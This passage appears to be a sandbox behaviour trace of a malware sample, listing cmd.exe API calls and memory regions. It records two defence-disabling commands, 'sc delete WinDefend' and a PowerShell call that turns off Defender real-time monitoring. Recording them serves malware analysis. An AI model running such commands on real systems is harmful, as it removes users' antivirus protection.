lpValue="C:\\Windows\\System32") returned 1 [0105.861] GetEnvironmentStringsW () returned 0x6d2378* [0105.861] FreeEnvironmentStringsW (penv=0x6d2378) returned 1 [0105.861] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a575260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.862] GetConsoleOutputCP () returned 0x1b5 [0105.864] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a574260 | out: lpCPInfo=0x4a574260) returned 1 [0105.864] GetUserDefaultLCID () returned 0x409 [0105.864] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a574950, cchData=8 | out: lpLCData=":") returned 2 [0105.865] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3df730, cchData=128 | out: lpLCData="0") returned 2 [0105.865] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3df730, cchData=128 | out: lpLCData="0") returned 2 [0105.865] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3df730, cchData=128 | out: lpLCData="1") returned 2 [0105.865] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a574940, cchData=8 | out: lpLCData="/") returned 2 [0105.865] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a574d80, cchData=32 | out: lpLCData="Mon") returned 4 [0105.865] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a574d40, cchData=32 | out: lpLCData="Tue") returned 4 [0105.865] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a574d00, cchData=32 | out: lpLCData="Wed") returned 4 [0105.865] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a574cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0105.865] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a574c80, cchData=32 | out: lpLCData="Fri") returned 4 [0105.865] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a574c40, cchData=32 | out: lpLCData="Sat") returned 4 [0105.865] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a574c00, cchData=32 | out: lpLCData="Sun") returned 4 [0105.865] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a574930, cchData=8 | out: lpLCData=".") returned 2 [0105.865] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a574920, cchData=8 | out: lpLCData=",") returned 2 [0105.865] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0105.866] GetConsoleTitleW (in: lpConsoleTitle=0x6c1030, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0105.867] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76540000 [0105.867] GetProcAddress (hModule=0x76540000, lpProcName="CopyFileExW") returned 0x76573b92 [0105.867] GetProcAddress (hModule=0x76540000, lpProcName="IsDebuggerPresent") returned 0x76554a5d [0105.868] GetProcAddress (hModule=0x76540000, lpProcName="SetConsoleInputExeNameW") returned 0x7656a79d [0105.893] _wcsicmp (_String1="sc", _String2=")") returned 74 [0105.893] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0105.893] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0105.893] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0105.893] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0105.893] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0105.893] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0105.894] GetConsoleTitleW (in: lpConsoleTitle=0x3df428, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0105.894] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0105.894] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0105.894] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0105.894] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0105.894] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0105.894] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0105.894] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0105.894] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0105.894] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0105.894] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0105.895] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0105.895] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0105.895] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0105.895] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0105.895] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0105.895] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0105.895] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0105.895] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0105.895] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0105.895] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0105.895] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0105.895] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0105.895] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0105.895] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0105.895] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0105.895] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0105.895] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0105.895] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0105.895] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0105.895] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0105.895] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0105.895] _wcsicmp (_String1="sc", _String2="START") returned -17 [0105.895] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0105.895] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0105.895] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0105.895] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0105.895] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0105.895] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0105.895] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0105.895] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0105.895] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0105.895] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0105.895] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0105.895] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0105.895] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0105.895] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0105.895] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0105.895] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0105.895] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0105.895] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0105.895] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0105.895] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0105.895] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0105.895] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0105.895] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0105.895] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0105.895] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0105.895] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0105.895] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0105.896] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0105.896] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0105.896] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0105.896] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0105.896] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0105.896] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0105.896] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0105.896] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0105.896] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0105.896] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0105.896] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0105.896] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0105.896] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0105.896] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0105.896] _wcsicmp (_String1="sc", _String2="START") returned -17 [0105.896] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0105.896] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0105.896] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0105.896] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0105.896] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0105.896] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0105.896] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0105.896] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0105.896] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0105.896] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0105.896] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0105.896] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0105.896] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0105.896] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0105.896] SetErrorMode (uMode=0x0) returned 0x0 [0105.896] SetErrorMode (uMode=0x1) returned 0x0 [0105.896] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6d57d8, lpFilePart=0x3def48 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x3def48*="system32") returned 0x13 [0105.896] SetErrorMode (uMode=0x0) returned 0x1 [0105.897] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0xbf [0105.897] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0105.902] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0105.904] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.904] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x3decc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3decc4) returned 0x6c1320 [0105.904] FindClose (in: hFindFile=0x6c1320 | out: hFindFile=0x6c1320) returned 1 [0105.904] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x3decc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3decc4) returned 0xffffffff [0105.904] GetLastError () returned 0x2 [0105.904] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x3decc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3decc4) returned 0x6c1320 [0105.904] FindClose (in: hFindFile=0x6c1320 | out: hFindFile=0x6c1320) returned 1 [0105.904] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0105.904] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0105.904] GetConsoleTitleW (in: lpConsoleTitle=0x3df1bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0105.905] InitializeProcThreadAttributeList (in: lpAttributeList=0x3df044, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3df10c | out: lpAttributeList=0x3df044, lpSize=0x3df10c) returned 1 [0105.905] UpdateProcThreadAttribute (in: lpAttributeList=0x3df044, dwFlags=0x0, Attribute=0x60001, lpValue=0x3df104, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3df044, lpPreviousValue=0x0) returned 1 [0105.905] GetStartupInfoW (in: lpStartupInfo=0x3df000 | out: lpStartupInfo=0x3df000*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="Path=%S", _MaxCount=0x7) returned -13 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0105.905] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0105.906] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0105.906] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0105.906] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0105.906] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0105.906] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0105.907] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc delete WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x3df0a0*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="sc delete WinDefend", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3df0ec | out: lpCommandLine="sc delete WinDefend", lpProcessInformation=0x3df0ec*(hProcess=0x78, hThread=0x74, dwProcessId=0x7d4, dwThreadId=0x930)) returned 1 [0106.091] CloseHandle (hObject=0x74) returned 1 [0106.091] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0106.091] GetEnvironmentStringsW () returned 0x6d4978* [0106.091] FreeEnvironmentStringsW (penv=0x6d4978) returned 1 [0106.091] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0106.913] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3defe0 | out: lpExitCode=0x3defe0*=0x5) returned 1 [0106.913] CloseHandle (hObject=0x78) returned 1 [0106.913] _vsnwprintf (in: _Buffer=0x3df128, _BufferCount=0x13, _Format="%08X", _ArgList=0x3defec | out: _Buffer="00000005") returned 8 [0106.913] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000005") returned 1 [0106.914] GetEnvironmentStringsW () returned 0x6d5fc0* [0106.914] FreeEnvironmentStringsW (penv=0x6d5fc0) returned 1 [0106.914] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0106.914] GetEnvironmentStringsW () returned 0x6d5fc0* [0106.914] FreeEnvironmentStringsW (penv=0x6d5fc0) returned 1 [0106.914] DeleteProcThreadAttributeList (in: lpAttributeList=0x3df044 | out: lpAttributeList=0x3df044) [0106.914] _get_osfhandle (_FileHandle=1) returned 0x7 [0106.914] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0106.914] _get_osfhandle (_FileHandle=1) returned 0x7 [0106.914] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5741ac | out: lpMode=0x4a5741ac) returned 1 [0106.914] _get_osfhandle (_FileHandle=0) returned 0x3 [0106.914] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5741b0 | out: lpMode=0x4a5741b0) returned 1 [0106.914] SetConsoleInputExeNameW () returned 0x1 [0106.914] GetConsoleOutputCP () returned 0x1b5 [0106.914] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a574260 | out: lpCPInfo=0x4a574260) returned 1 [0106.914] SetThreadUILanguage (LangId=0x0) returned 0x409 [0106.915] exit (_Code=5) Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4090b000" os_pid = "0x900" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x8bc" cmd_line = "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1499 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1500 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1501 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1502 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1503 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1504 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 1505 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1506 start_va = 0x4a550000 end_va = 0x4a59bfff entry_point = 0x4a550000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1507 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1508 start_va = 0x777c0000 end_va = 0x7793ffff entry_point = 0x777c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1509 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1510 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1511 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1512 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1513 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1514 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1515 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1516 start_va = 0x280000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1517 start_va = 0x750d0000 end_va = 0x7512bfff entry_point = 0x750d0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1518 start_va = 0x75240000 end_va = 0x7527efff entry_point = 0x75240000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1519 start_va = 0x752b0000 end_va = 0x752b7fff entry_point = 0x752b0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1551 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1552 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1553 start_va = 0x1f0000 end_va = 0x256fff entry_point = 0x1f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1554 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 1555 start_va = 0x75280000 end_va = 0x75286fff entry_point = 0x75280000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 1556 start_va = 0x75310000 end_va = 0x7531bfff entry_point = 0x75310000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1557 start_va = 0x75320000 end_va = 0x7537ffff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1558 start_va = 0x75390000 end_va = 0x7542ffff entry_point = 0x75390000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1559 start_va = 0x75510000 end_va = 0x75519fff entry_point = 0x75510000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1560 start_va = 0x755d0000 end_va = 0x7565ffff entry_point = 0x755d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1561 start_va = 0x758f0000 end_va = 0x759dffff entry_point = 0x758f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1562 start_va = 0x759f0000 end_va = 0x75a08fff entry_point = 0x759f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1563 start_va = 0x75b60000 end_va = 0x75bfcfff entry_point = 0x75b60000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1564 start_va = 0x75c00000 end_va = 0x75cabfff entry_point = 0x75c00000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1565 start_va = 0x76110000 end_va = 0x76155fff entry_point = 0x76110000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1566 start_va = 0x76380000 end_va = 0x7647ffff entry_point = 0x76380000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1567 start_va = 0x76540000 end_va = 0x7664ffff entry_point = 0x76540000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1568 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 1569 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x0 region_type = private name = "private_0x00000000774e0000" filename = "" Region: id = 1570 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1571 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1572 start_va = 0x610000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 1573 start_va = 0x620000 end_va = 0x7a7fff entry_point = 